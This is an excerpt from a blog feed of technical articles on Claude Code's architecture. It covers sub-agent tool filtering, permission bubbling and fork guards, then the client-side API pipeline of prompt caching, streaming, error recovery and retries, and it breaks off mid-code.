&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;tools&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="nv"&gt;Read&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;Grep&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;Glob&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;Bash&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;          &lt;span class="s"&gt;→ only these tools available&lt;/span&gt;
&lt;span class="na"&gt;disallowed_tools&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="nv"&gt;Write&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;Edit&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;Agent&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;    &lt;span class="s"&gt;→ these removed from pool&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The resolution:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Start with the full tool pool&lt;/li&gt;
&lt;li&gt;If &lt;code&gt;tools&lt;/code&gt; is specified and not &lt;code&gt;['*']&lt;/code&gt;, filter to only listed tools (plus always-included tools like the stop tool)&lt;/li&gt;
&lt;li&gt;Remove any tools in &lt;code&gt;disallowed_tools&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Remove agent-disallowed tools (Agent tool itself for non-fork agents, plan mode tools)&lt;/li&gt;
&lt;/ol&gt;
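&lt;p&gt;The four steps can be sketched directly. The always-included set and the agent-level exclusions are placeholders for the real lists:&lt;/p&gt;

```python
# Minimal sketch of the four-step tool resolution described above.

ALWAYS_INCLUDED = {"Stop"}          # stand-in for e.g. the stop tool

def resolve_tools(pool, tools=None, disallowed=(), agent_disallowed=()):
    result = list(pool)                                    # 1. full pool
    if tools is not None and tools != ["*"]:
        keep = set(tools) | ALWAYS_INCLUDED
        result = [t for t in result if t in keep]          # 2. allowlist
    result = [t for t in result if t not in set(disallowed)]        # 3.
    result = [t for t in result if t not in set(agent_disallowed)]  # 4.
    return result
```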

&lt;p&gt;Read-only agents like Explore and Plan additionally skip CLAUDE.md (saves ~5-15 Gtok/week fleet-wide) and git status (stale snapshot, they'll run &lt;code&gt;git status&lt;/code&gt; themselves if needed).&lt;/p&gt;

&lt;h3&gt;
  
  
  Permission Bubbling
&lt;/h3&gt;

&lt;p&gt;When an agent needs a permission decision:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Sync agents&lt;/strong&gt;: The prompt surfaces in the parent's terminal. The user approves or denies. The decision propagates to the child's permission context.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Async agents in bubble mode&lt;/strong&gt;: Same as sync — the prompt surfaces in the parent's terminal, but the agent waits asynchronously. Automated checks (permission classifier, hooks) run first; the user is only interrupted when automation can't resolve it.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Async agents without bubble&lt;/strong&gt;: Permissions are auto-denied. The agent must work within its pre-approved tool rules.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Teammates&lt;/strong&gt;: Permission mode is inherited via CLI flags when spawning the process. &lt;code&gt;--dangerously-skip-permissions&lt;/code&gt; propagates — but not when plan mode is required (a safety interlock).&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Fork Recursion Guard
&lt;/h3&gt;

&lt;p&gt;Fork children keep the Agent tool in their tool pool (for cache-identical tool definitions), but recursive forking is blocked at call time. The system scans the conversation history for a boilerplate tag injected into every fork child's first message. If found, the agent is already a fork — further forking is rejected.&lt;/p&gt;

&lt;p&gt;The boilerplate itself is instructive. Every fork child receives a message that begins:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;STOP. READ THIS FIRST.

You are a forked worker process. You are NOT the main agent.

RULES (non-negotiable):
1. Your system prompt says "default to forking." IGNORE IT — that's for
   the parent. You ARE the fork. Do NOT spawn sub-agents; execute directly.
2. Do NOT converse, ask questions, or suggest next steps
3. USE your tools directly: Bash, Read, Write, etc.
...
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This prompt engineering is a defense-in-depth against the model's tendency to delegate. The system prompt (inherited from the parent for cache reasons) may contain instructions to fork work. The boilerplate overrides those instructions at the conversation level — later in the message sequence, higher priority.&lt;/p&gt;

&lt;h3&gt;
  
  
  Worktree Isolation
&lt;/h3&gt;

&lt;p&gt;Agents can be spawned with &lt;code&gt;isolation: "worktree"&lt;/code&gt;, which creates a separate git worktree: a second working-tree checkout on its own branch, sharing the repository's object database. The agent operates in this isolated checkout: writes don't affect the parent's files, and the parent's subsequent edits don't corrupt the agent's state.&lt;/p&gt;

&lt;p&gt;When a worktree agent inherits conversation context from the parent, all file paths in that context refer to the parent's working directory. The system injects a notice telling the agent to translate paths, re-read files before editing (they may have changed since the parent saw them), and understand that changes are isolated.&lt;/p&gt;

&lt;h3&gt;
  
  
  Max Turns and Cleanup
&lt;/h3&gt;

&lt;p&gt;Every agent has a turn limit (default varies by agent type, capped by definition). When the limit is reached, the agent receives a &lt;code&gt;max_turns_reached&lt;/code&gt; attachment and stops. The cleanup sequence:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;1. Close agent-specific MCP servers (only newly created ones, not shared)
2. Remove scoped hooks registered by the agent's frontmatter
3. Clear prompt cache tracking state
4. Release cloned file state cache
5. Free conversation messages (GC)
6. Remove Perfetto trace registration
7. Clear transcript routing
8. Kill background bash tasks spawned by this agent
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This cleanup happens in a &lt;code&gt;finally&lt;/code&gt; block — it runs whether the agent succeeded, failed, or was aborted.&lt;/p&gt;




&lt;h2&gt;
  
  
  The Full Pipeline
&lt;/h2&gt;

&lt;p&gt;When you type a message, here's how each extension system comes into play:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;1. CLAUDE.md files discovered and loaded (6-tier hierarchy)
   → Instructions injected as system-reminder in user message

2. UserPromptSubmit hooks fire
   → Can block the prompt, inject additional context, or modify it

3. System prompt assembled with skill metadata
   → ~50-100 tokens per skill, budget-capped at 1% of context

4. Tool pool assembled (built-in + MCP, sorted, deduplicated)
   → Deny rules applied, built-ins win on name conflict

5. Model generates response, calls tools
   → PreToolUse hooks fire before each tool (can block, allow, modify input)
   → PostToolUse hooks fire after each tool (can inject context)

6. Model invokes a Skill
   → Permission check → full body loaded → argument substitution
   → Shell commands executed (unless MCP source) → content injected

7. Model spawns an Agent
   → Isolated context created → tools filtered → MCP servers merged
   → Hooks scoped → query loop runs → results returned

8. Session ends
   → SessionEnd hooks fire (1.5-second timeout)
   → MCP servers disconnected → agent cleanup
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Every layer is fail-closed. Unknown CLAUDE.md extensions are skipped. Unknown hook events are ignored. Unknown skill types are rejected. Unknown MCP tools are filtered by deny rules. Unknown agent types are blocked at validation. The system doesn't need to anticipate every new extension type — it only needs to correctly handle the ones it explicitly supports. Everything else gets a "no."&lt;/p&gt;

&lt;p&gt;The alternative — a blocklist approach where you enumerate what's dangerous — means every new extension type is a zero-day. The allowlist approach means every new extension type starts with "ask the user." That's the fundamental trade-off: a slight friction on adoption in exchange for a structural guarantee that surprises are visible.&lt;/p&gt;

</description>
      <category>claudecode</category>
      <category>architecture</category>
      <category>mcp</category>
      <category>aiagents</category>
    </item>
    <item>
      <title>What Happens When Claude Code Calls the API</title>
      <dc:creator>Laurent DeSegur</dc:creator>
      <pubDate>Wed, 08 Apr 2026 02:27:32 +0000</pubDate>
      <link>https://dev.to/oldeucryptoboi/what-happens-when-claude-code-calls-the-api-3ngo</link>
      <guid>https://dev.to/oldeucryptoboi/what-happens-when-claude-code-calls-the-api-3ngo</guid>
      <description>&lt;h2&gt;
  
  
  The Problem
&lt;/h2&gt;

&lt;p&gt;You type a message. The model needs to see it, along with every previous message, the system prompt, tool schemas, and various configuration. That context gets serialized into an HTTP request, sent to a remote server, and a response streams back as server-sent events. Simple enough — until you consider everything that can go wrong.&lt;/p&gt;

&lt;p&gt;The server can be overloaded (529). Your credentials can expire mid-session. The response can be too long for the context window. The connection can go stale. The server can tell you to back off for five minutes, or five hours. The model can try to call a tool that failed three turns ago. Your cache — the thing saving you 90% on input costs — can silently break because a tool schema changed.&lt;/p&gt;

&lt;p&gt;The naive approach is: send request, get response, show to user. One function, maybe a try/catch. This fails because a single API call in an agentic loop is not a one-shot operation. It's the inner loop of a system that runs for hours, making hundreds of calls, where each call builds on the state of every previous call. A retry strategy that works for a one-shot chatbot (wait and retry) causes cascading amplification in a capacity crisis. A token counter that's off by 5% will eventually overflow the context window. A cache break you don't detect silently triples your costs.&lt;/p&gt;

&lt;p&gt;The design principle is &lt;strong&gt;defense in depth with fail-visible defaults&lt;/strong&gt;. Every failure should either be recovered automatically or surfaced to the user with a specific recovery action. Silent failures — where the system degrades without anyone noticing — are the enemy. Cache breaks get detected and logged. Token counts get cross-checked against API-reported usage. Retry decisions consider not just "can we retry" but "should we, given what everyone else is doing right now."&lt;/p&gt;

&lt;p&gt;This article traces the full client-side pipeline: request construction, caching, retries, streaming, error recovery, cost tracking, and rate limit management. Everything here is verifiable from the source code. The server side — tokenization, routing, inference, post-processing — is invisible to the client and won't be covered.&lt;/p&gt;

&lt;h2&gt;
  
  
  Building the Request
&lt;/h2&gt;

&lt;h3&gt;
  
  
  The System Prompt
&lt;/h3&gt;

&lt;p&gt;Consider what the model needs to know before it sees your message. Its identity, its behavioral rules, what tools it has, how to use them, what tone to take, what language to write in, what project it's working on, what it remembered from previous sessions, what MCP servers are connected. This is the system prompt — a multi-kilobyte payload assembled from ~15 separate section generators.&lt;/p&gt;

&lt;p&gt;The prompt has a deliberate physical layout. Everything that stays constant across turns — identity, coding guidelines, tool instructions, style rules — sits at the top. Everything that changes per turn — memory, language preferences, environment info, MCP instructions — sits at the bottom, after an internal boundary marker.&lt;/p&gt;

&lt;p&gt;Why this split? The API caches the prompt prefix. On turn 2, the server recognizes the cached prefix and reads it cheaply. If a dynamic section (say, updated memory) sat in the middle, it would invalidate everything after it. By putting all dynamic content at the end, the stable prefix stays cached and only the changing tail incurs write costs.&lt;/p&gt;

&lt;p&gt;The system prompt also has a priority hierarchy. An override replaces everything (used by the API parameter). Otherwise: agent-specific prompts (for subagents) &amp;gt; custom prompts (user-specified) &amp;gt; default prompt. An append prompt (from settings like CLAUDE.md) is always added at the end, regardless of which base prompt was selected. This means your CLAUDE.md instructions survive even when the system switches to a subagent prompt.&lt;/p&gt;

&lt;h3&gt;
  
  
  Messages
&lt;/h3&gt;

&lt;p&gt;The internal conversation history is a rich format with UUIDs, timestamps, tool metadata, and attachment links. The API expects a simpler format: alternating user/assistant messages with typed content blocks.&lt;/p&gt;

&lt;p&gt;Two conversion functions transform the internal format. Both clone their content arrays before modification — a defensive pattern that prevents the API serialization layer from accidentally mutating the in-memory conversation state. This matters because the same message objects get reused across retry attempts and displayed in the UI.&lt;/p&gt;

&lt;p&gt;Before conversion, messages pass through a compression pipeline that runs on every API call:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Tool result budgeting&lt;/strong&gt; — Caps the total size of tool results per message. A tool that returned 50KB of output gets truncated.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;History snipping&lt;/strong&gt; — Removes the oldest messages when the conversation exceeds a threshold.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Microcompaction&lt;/strong&gt; — Clears stale tool results (file reads, shell output, search results) when the prompt cache has expired and they'll be re-tokenized anyway.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Context collapse&lt;/strong&gt; — Applies staged summarization to older conversation segments.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Autocompaction&lt;/strong&gt; — Full model-based conversation summary when approaching the context limit.&lt;/li&gt;
&lt;/ol&gt;
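&lt;p&gt;Step 1, tool result budgeting, can be sketched as a running-budget truncation. The budget constant and block shapes here are assumptions:&lt;/p&gt;

```python
# Illustrative sketch of per-message tool-result budgeting. The 40,000
# character budget is an assumed figure, not the real cap.

TOOL_RESULT_BUDGET = 40_000

def budget_tool_results(blocks, budget=TOOL_RESULT_BUDGET):
    remaining = budget
    out = []
    for block in blocks:
        if block["type"] != "tool_result":
            out.append(block)
            continue
        text = block["content"]
        if len(text) > remaining:
            text = text[:remaining] + "\n[truncated]"
        remaining = max(0, remaining - len(block["content"]))
        out.append({**block, "content": text})
    return out
```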

&lt;p&gt;After conversion, additional cleanup runs:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Tool result pairing&lt;/strong&gt; — Every &lt;code&gt;tool_use&lt;/code&gt; block from the model must have a matching &lt;code&gt;tool_result&lt;/code&gt;. Orphaned tool uses (from aborts, fallbacks, or compaction) get synthetic placeholder results. The API rejects unpaired blocks, and this failure mode is subtle enough that it has dedicated diagnostic logging.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Media stripping&lt;/strong&gt; — Caps total media items (images, PDFs) at 100 per request. Earlier items are stripped first. This prevents conversations that accumulate many screenshots from exceeding payload limits.&lt;/li&gt;
&lt;/ul&gt;
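&lt;p&gt;The most common pairing repair, a trailing &lt;code&gt;tool_use&lt;/code&gt; orphaned by an abort, can be sketched like this. The placeholder text and message shapes are assumptions:&lt;/p&gt;

```python
# Sketch of the orphaned-tool_use repair described above, handling the
# abort case where the final assistant message went unanswered.

def pair_trailing_tool_uses(messages):
    """If the final assistant message has unanswered tool_use blocks,
    append synthetic tool_result placeholders so the API accepts it."""
    if not messages or messages[-1]["role"] != "assistant":
        return messages
    orphans = [b["id"] for b in messages[-1]["content"]
               if b["type"] == "tool_use"]
    if not orphans:
        return messages
    return messages + [{"role": "user", "content": [
        {"type": "tool_result", "tool_use_id": u,
         "content": "[tool use was not completed]"} for u in orphans]}]
```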

&lt;h3&gt;
  
  
  Prompt Caching
&lt;/h3&gt;

&lt;p&gt;Caching is the most financially significant optimization. On a long session, 90%+ of input tokens may be cache reads, and on a $5/Mtok model, cache reads cost $0.50/Mtok: a 90% discount.&lt;/p&gt;

&lt;p&gt;The client places cache markers (&lt;code&gt;cache_control&lt;/code&gt; directives) at two levels:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;System prompt blocks&lt;/strong&gt;: Every block gets a marker. The server caches them as a unit.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Message history&lt;/strong&gt;: A single breakpoint at the last message (or second-to-last if skip-write is set). Everything before this point is eligible for caching.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Tool results that appear before the cache breakpoint get &lt;code&gt;cache_reference&lt;/code&gt; tags linking them to their tool use IDs. This enables server-side cache editing — the server can delete a specific cached tool result without invalidating the entire prefix. This is how the system reclaims space from old tool results while keeping the cache warm.&lt;/p&gt;

&lt;p&gt;Cache control details vary by eligibility:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ephemeral&lt;/span&gt;
&lt;span class="na"&gt;ttl&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;5 minutes (default) or 1 hour (for eligible users)&lt;/span&gt;
&lt;span class="na"&gt;scope&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;global (shared across sessions) or unset&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The 1-hour TTL is gated on subscriber status (not in overage) AND an allowlist of query sources. The allowlist uses prefix matching — &lt;code&gt;repl_main_thread*&lt;/code&gt; covers all output style variants. This prevents background queries (title generation, suggestions) from claiming expensive 1-hour cache slots.&lt;/p&gt;
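&lt;p&gt;The gating reduces to a conjunction plus a prefix match. A sketch with illustrative field names:&lt;/p&gt;

```python
# Sketch of the 1-hour TTL gating described above. The allowlist entry
# and field names are illustrative.

LONG_TTL_SOURCES = ["repl_main_thread"]   # prefix-matched, per the text

def cache_ttl(is_subscriber: bool, in_overage: bool, query_source: str) -> str:
    eligible = (is_subscriber and not in_overage and
                any(query_source.startswith(p) for p in LONG_TTL_SOURCES))
    return "1h" if eligible else "5m"
```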

&lt;h3&gt;
  
  
  Tools, Thinking, and Extra Parameters
&lt;/h3&gt;

&lt;p&gt;Each tool gets serialized to a JSON schema with name, description, and input schema. MCP tools can be deferred — the model sees the tool name but requests full details on demand, reducing the upfront token cost when dozens of MCP tools are connected.&lt;/p&gt;

&lt;p&gt;Thinking has three modes. &lt;strong&gt;Adaptive&lt;/strong&gt;: the model decides how much to reason (latest models only). &lt;strong&gt;Budget&lt;/strong&gt;: a fixed token budget for thinking. &lt;strong&gt;Disabled&lt;/strong&gt;: no thinking blocks. When thinking is enabled, the API rejects requests that also set &lt;code&gt;temperature&lt;/code&gt;, so the client forces temperature to undefined.&lt;/p&gt;

&lt;p&gt;The request body also carries: a speed parameter for fast mode (same model, faster inference, higher cost), an effort level, structured output format, task budgets for auto-continuation, feature flag beta headers, and extra body parameters parsed from an environment variable (for enterprise configurations like anti-distillation).&lt;/p&gt;

&lt;h3&gt;
  
  
  The Actual Call
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="nf"&gt;create&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
  &lt;span class="nx"&gt;parameters&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="na"&gt;stream&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt; &lt;span class="p"&gt;},&lt;/span&gt;
  &lt;span class="nx"&gt;options&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;abort_signal&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;headers&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nl"&gt;client_request_id&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;random_uuid&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nf"&gt;with_response&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Always streaming. Always with an abort signal. The &lt;code&gt;.with_response()&lt;/code&gt; call extracts both the event stream and the raw HTTP response object. The raw response is needed for header inspection — rate limit status, cache metrics, and request IDs all come from response headers, not the stream body.&lt;/p&gt;

&lt;p&gt;The client request ID is a UUID generated per call. It exists because timeout errors return no server-side request ID. When a request times out after 10 minutes, this is the only way to correlate the client failure with server-side logs.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Client
&lt;/h2&gt;

&lt;p&gt;Before any request fires, a factory function creates the SDK client. The client is provider-specific:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Direct API&lt;/strong&gt;: API key or OAuth token authentication&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;AWS Bedrock&lt;/strong&gt;: AWS credentials (bearer token, IAM, or STS session)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Azure Foundry&lt;/strong&gt;: Azure AD credentials or API key&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Google Vertex AI&lt;/strong&gt;: Google Application Default Credentials with per-model region routing&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;All four providers return the same base type, so downstream code doesn't branch on provider. The provider-specific complexity is confined to the factory.&lt;/p&gt;

&lt;p&gt;A design trade-off in the Vertex setup: the Google auth library's auto-detection hits the GCE metadata server when no credentials are configured, which hangs for 12 seconds on non-GCE machines. The client checks environment variables and credential file paths first, only falling back to the metadata-server path when neither is present. This trades a longer code path for avoiding a 12-second hang in the common case.&lt;/p&gt;

&lt;p&gt;Every request carries session-identifying headers: an app identifier (&lt;code&gt;cli&lt;/code&gt;), a session ID, the SDK version, and optionally a container ID for remote environments. Custom headers from an environment variable (newline-separated &lt;code&gt;Name: Value&lt;/code&gt; format) are merged in. For first-party API calls, the SDK's fetch function is wrapped to inject the client request ID and log the request path for debugging.&lt;/p&gt;
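&lt;p&gt;A sketch of that header assembly (the header names here are illustrative, not the actual wire names):&lt;/p&gt;

```python
import uuid

def parse_custom_headers(raw):
    """Parse newline-separated 'Name: Value' pairs from an env var."""
    headers = {}
    for line in raw.splitlines():
        if ":" not in line:
            continue  # skip malformed lines silently
        name, value = line.split(":", 1)
        if name.strip():
            headers[name.strip()] = value.strip()
    return headers

def build_request_headers(session_id, sdk_version, custom_raw="", container_id=None):
    """Session-identifying headers, with env-var custom headers merged in."""
    headers = {
        "x-app": "cli",
        "x-session-id": session_id,
        "x-sdk-version": sdk_version,
        # per-call UUID: the only correlation handle when a request times out
        "x-client-request-id": str(uuid.uuid4()),
    }
    if container_id:
        headers["x-container-id"] = container_id  # remote environments only
    headers.update(parse_custom_headers(custom_raw))
    return headers
```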

&lt;h2&gt;
  
  
  Streaming
&lt;/h2&gt;

&lt;h3&gt;
  
  
  What the User Sees
&lt;/h3&gt;

&lt;p&gt;While the API call is in flight, the user sees a spinner with live feedback. The spinner shows the current mode ("Thinking...", "Reading files...", "Running tools..."), an approximate token count updated in real time as stream chunks arrive, and the elapsed time. If the stream stalls for more than 3 seconds, the spinner changes to indicate the stall visually. If the stall exceeds 30 seconds, the UI offers a contextual tip.&lt;/p&gt;

&lt;p&gt;During retries, the user sees a countdown: "Retrying in X seconds..." with the current attempt number and maximum retries. This is the retry generator's yielded status messages being rendered — the async generator architecture means the UI stays responsive even during long backoff waits.&lt;/p&gt;

&lt;p&gt;When a rate limit warning is active, the notification bar shows utilization percentage and reset time. When context runs low, a token warning shows remaining capacity and distance to the auto-compact threshold. When a model fallback occurs, a system message appears explaining the switch.&lt;/p&gt;

&lt;p&gt;All of this feedback comes from the same event stream — the query loop yields events (stream chunks, retry status, error messages, compaction summaries) and the UI renders them in real time. Nothing blocks on the complete response.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Event Protocol
&lt;/h3&gt;

&lt;p&gt;The response arrives as server-sent events:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;message_start     → initialize, extract initial usage
content_block_start → begin text / thinking / tool_use block
content_block_delta → accumulate content chunks
content_block_stop  → finalize block
message_delta     → update total usage, set stop reason
message_stop      → end of stream
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Text deltas are concatenated. Tool use inputs arrive as JSON fragments that are reassembled into a complete JSON object by the final &lt;code&gt;content_block_stop&lt;/code&gt;. Thinking blocks accumulate both thinking text and a cryptographic signature (for verification).&lt;/p&gt;
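&lt;p&gt;A minimal accumulator for this protocol might look like the following sketch (event shapes simplified to the fields used here):&lt;/p&gt;

```python
import json

def accumulate(events):
    """Fold a stream of SSE events into finalized content blocks."""
    blocks, open_blocks, stop_reason = [], {}, None
    for ev in events:
        t = ev["type"]
        if t == "content_block_start":
            open_blocks[ev["index"]] = dict(ev["content_block"])  # begin block
        elif t == "content_block_delta":
            block, delta = open_blocks[ev["index"]], ev["delta"]
            if delta["type"] == "text_delta":
                block["text"] = block.get("text", "") + delta["text"]  # concatenate text
            elif delta["type"] == "input_json_delta":
                # tool inputs arrive as JSON fragments; buffer until stop
                block["_partial_json"] = block.get("_partial_json", "") + delta["partial_json"]
        elif t == "content_block_stop":
            block = open_blocks.pop(ev["index"])
            if "_partial_json" in block:
                block["input"] = json.loads(block.pop("_partial_json"))  # reassemble
            blocks.append(block)
        elif t == "message_delta":
            stop_reason = ev["delta"].get("stop_reason", stop_reason)
    return blocks, stop_reason
```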

&lt;h3&gt;
  
  
  The Idle Watchdog
&lt;/h3&gt;

&lt;p&gt;A timer tracks the interval between stream chunks. If no data arrives for 90 seconds, the request is aborted. A warning fires at 45 seconds. This catches a failure mode that TCP timeouts don't: the connection is alive (TCP keepalives succeed) but the server has stopped sending data. Without the watchdog, the client would hang silently for the full 10-minute request timeout.&lt;/p&gt;

&lt;p&gt;The 90-second threshold is configurable via environment variable. The trade-off: too short and you abort legitimate long-thinking responses; too long and you waste minutes on hung connections.&lt;/p&gt;
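&lt;p&gt;The watchdog reduces to tracking a last-chunk timestamp. A sketch with the thresholds described above (the &lt;code&gt;clock&lt;/code&gt; parameter exists only for testability):&lt;/p&gt;

```python
import time

IDLE_WARN_SECS = 45
IDLE_ABORT_SECS = 90  # configurable via environment variable in the real client

class IdleWatchdog:
    """Abort a stream when no chunk arrives within the idle threshold."""

    def __init__(self, warn=IDLE_WARN_SECS, abort=IDLE_ABORT_SECS, clock=time.monotonic):
        self.warn, self.abort, self.clock = warn, abort, clock
        self.last_chunk = clock()
        self.warned = False

    def on_chunk(self):
        """Reset the idle timer whenever stream data arrives."""
        self.last_chunk = self.clock()
        self.warned = False

    def check(self):
        """Return 'ok', 'warn' (once per stall), or 'abort'."""
        idle = self.clock() - self.last_chunk
        if idle >= self.abort:
            return "abort"
        if idle >= self.warn and not self.warned:
            self.warned = True
            return "warn"
        return "ok"
```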

&lt;h3&gt;
  
  
  Streaming Tool Execution
&lt;/h3&gt;

&lt;p&gt;When the model emits a tool use block, tool execution can start immediately — while the model might still be generating text or additional tool calls. If the model makes three tool calls and each takes 5 seconds, sequential execution adds 15 seconds. With streaming execution, the first tool starts as soon as it's emitted, and all three may finish by the time the response completes.&lt;/p&gt;

&lt;p&gt;If a model fallback occurs mid-stream (3 consecutive overload errors trigger a switch to a fallback model), the streaming executor's pending results are discarded. Tools are re-executed after the fallback response arrives. This prevents stale results from a partially-failed request from contaminating the fallback response.&lt;/p&gt;

&lt;h3&gt;
  
  
  Resource Cleanup
&lt;/h3&gt;

&lt;p&gt;When streaming ends — normally, on error, or on abort — the client explicitly releases resources: the SDK stream object is cleaned up, and the HTTP response body is cancelled. This is a defensive pattern against connection pool exhaustion. In a long session with hundreds of tool loops, each API call opens a connection. Without explicit cleanup, idle connections accumulate until the pool is full and new requests fail with connection errors.&lt;/p&gt;

&lt;h3&gt;
  
  
  Post-Response Recovery
&lt;/h3&gt;

&lt;p&gt;When the model responds but the response is problematic (no tool calls, but an error condition), the query loop has fallback strategies before surfacing the error:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Prompt too long&lt;/strong&gt;: First, drain any staged context collapses. If that doesn't free enough space, try reactive compaction — an aggressive, single-shot compression of the conversation. If that also fails, surface the error with a &lt;code&gt;/compact&lt;/code&gt; hint.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Max output tokens hit&lt;/strong&gt;: First, try escalating from 8K to 64K output tokens (one-time). If still hitting limits, inject a "Resume directly from where you left off" message and retry. Maximum 3 retries. This handles the case where the model's response is legitimately long (a large code generation) rather than pathologically stuck.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Media size errors&lt;/strong&gt;: Try reactive compaction with media stripping — removing images and documents that pushed the request over the payload limit.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Each strategy is tried once per error type. The system doesn't loop on recovery.&lt;/p&gt;
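&lt;p&gt;The once-per-error-type semantics can be sketched as a dispatch table (strategy names paraphrase the descriptions above; not the actual function names):&lt;/p&gt;

```python
def recover(error_type, tried, actions):
    """Try each recovery strategy at most once; never loop on recovery.

    `actions` maps a strategy name to a callable returning True on success.
    Returns the strategy that succeeded, or None if the error must surface.
    """
    strategies = {
        "prompt_too_long": ["drain_staged_collapses", "reactive_compaction"],
        "max_output_tokens": ["escalate_output_limit", "resume_from_cutoff"],
        "media_too_large": ["compact_with_media_stripping"],
    }
    for name in strategies.get(error_type, []):
        if name in tried:
            continue  # each strategy runs once per error type
        tried.add(name)
        if actions[name]():
            return name
    return None  # all strategies exhausted: surface the error
```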

&lt;h2&gt;
  
  
  The Retry Wrapper
&lt;/h2&gt;

&lt;p&gt;Every API call is wrapped in a retry generator. It yields status messages during waits (so the UI can show "Retrying in X seconds...") and returns the final result on success.&lt;/p&gt;
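&lt;p&gt;A synchronous Python sketch of that yield-status, return-result shape (the real client uses async generators; sleeps are omitted here):&lt;/p&gt;

```python
def retry_generator(attempt_fn, max_attempts=10, delays=None,
                    is_retryable=lambda exc: True):
    """Yield status messages between attempts; return the result on success.

    `attempt_fn` raises on failure; `delays` supplies the per-attempt wait
    in seconds (in the real client this is where the backoff sleep happens).
    """
    delays = delays or [2 ** n for n in range(max_attempts)]
    for attempt in range(1, max_attempts + 1):
        try:
            return attempt_fn()  # success: generator returns the result
        except Exception as exc:
            if attempt == max_attempts or not is_retryable(exc):
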